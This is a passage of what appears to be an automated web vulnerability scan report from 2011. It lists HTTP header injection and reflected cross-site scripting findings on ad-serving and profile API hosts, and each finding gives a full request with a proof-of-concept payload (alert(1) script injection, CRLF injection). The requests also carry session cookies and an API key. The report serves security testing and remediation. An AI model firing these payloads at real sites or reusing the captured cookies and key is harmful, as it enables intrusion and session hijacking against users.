2.15. http://ad.doubleclick.net/adj/mtv.mtvi/btf_j_s/music/_mn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/mtv.mtvi/btf_j_s/music/_mn

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c8a0%0d%0a598aa37f06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c8a0%0d%0a598aa37f06f/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;demo=775;demo=774;u=!category-expand%7C!category-float%7Cnode-survey%7Cpos-btf%7Ctag-adj%7Cmtype-standard%7Csz-300x250%7Ctile-3%7Cdemo-D%7Cdemo-T%7Cdemo-5840%7Cdemo-2966%7Cdemo-2907%7Cdemo-2905%7Cdemo-2904%7Cdemo-1607%7Cdemo-1299%7Cdemo-850%7Cdemo-848%7Cdemo-844%7Cdemo-827%7Cdemo-790%7Cdemo-777%7Cdemo-775%7Cdemo-774;ord=927227632701397000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c8a0
598aa37f06f
/mtv.mtvi/btf_j_s/music/_mn;sec0=music;sec1=_mn;!category=expand;!category=float;node=survey;pos=btf;tag=adj;mtype=standard;sz=300x250;tile=3;demo=D;demo=T;demo=5840;demo=2966;demo=2907;demo=2905;demo=2904;demo=1607;demo=1299;demo=850;demo=848;demo=844;demo=827;demo=790;demo=777;d:
Date: Tue, 14 Jun 2011 00:18:06 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)  previous  next
There are 74 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f1d"-alert(1)-"349fca594e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=&e3f1d"-alert(1)-"349fca594e1=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6563
Date: Tue, 14 Jun 2011 00:17:24 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=&e3f1d"-alert(1)-"349fca594e1=1http%3a%2f%2fwww.teleflora.com/%3Fsrccode%3Dme_msnret_bt_ev11_ros_728x90%26promotioncode%3Dmeed15");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dca
...[SNIP]...

3.2. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac46f"-alert(1)-"b4f7ed4dde6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=ac46f"-alert(1)-"b4f7ed4dde6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6509
Date: Tue, 14 Jun 2011 00:16:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
bureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=ac46f"-alert(1)-"b4f7ed4dde6http://www.teleflora.com/?srccode=me_msnret_bt_ev11_ros_728x90&promotioncode=meed15");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.3. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [;s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The value of the ;s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54b9f"style%3d"x%3aexpression(alert(1))"10025daa06f was submitted in the ;s parameter. This input was echoed as 54b9f"style="x:expression(alert(1))"10025daa06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904;54b9f"style%3d"x%3aexpression(alert(1))"10025daa06f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 552
Date: Tue, 14 Jun 2011 00:14:08 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/h;215935200;4-0;0;15527176;29332-377/140;38766070/38783827/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;54b9f"style="x:expression(alert(1))"10025daa06f;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://sales-jobs.fins.com/?reflink=djm_bcu_sales_x140">
...[SNIP]...

3.4. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22602"style%3d"x%3aexpression(alert(1))"b75c91509da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22602"style="x:expression(alert(1))"b75c91509da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904;&22602"style%3d"x%3aexpression(alert(1))"b75c91509da=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 522
Date: Tue, 14 Jun 2011 00:15:03 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/u;215935200;5-0;0;15527176;29332-377/140;37749806/37767658/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;&22602"style="x:expression(alert(1))"b75c91509da=1;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://www.wsjwine.com/2861003">
...[SNIP]...

3.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f96e5</script><script>alert(1)</script>74733bd38c5 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*f96e5</script><script>alert(1)</script>74733bd38c5 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
uhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*f96e5</script><script>alert(1)</script>74733bd38c5">
...[SNIP]...

3.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f733d</script><script>alert(1)</script>8a02258715a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.7522770736832172?click=http://global.ard.yahoo.com/SIG=15lkbuhbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*&f733d</script><script>alert(1)</script>8a02258715a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
hbo/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307981483/L=bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT/B=SnIAKmKL5WA-/J=1307974283257435/K=WV.FHM_EsyZAV7OsrCOkmw/A=6304414/R=0/*&f733d</script><script>alert(1)</script>8a02258715a=1">
...[SNIP]...

3.7. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 5638e<script>alert(1)</script>c0fe4a3a74d was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData5638e<script>alert(1)</script>c0fe4a3a74d&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:14:23 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2JxzTwGAeDvFExkNK7HUtFp4B4dlWpgdiilmSbD5NislZj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VeiiLshipt0u7449JRFsRyXovJtAis5nbdyl7dWr1XIQIIGVUpXyUhXA0M0BiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData5638e<script>alert(1)</script>c0fe4a3a74d({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

3.8. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload baefe<script>alert(1)</script>f74b73704e0 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvunbaefe<script>alert(1)</script>f74b73704e0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj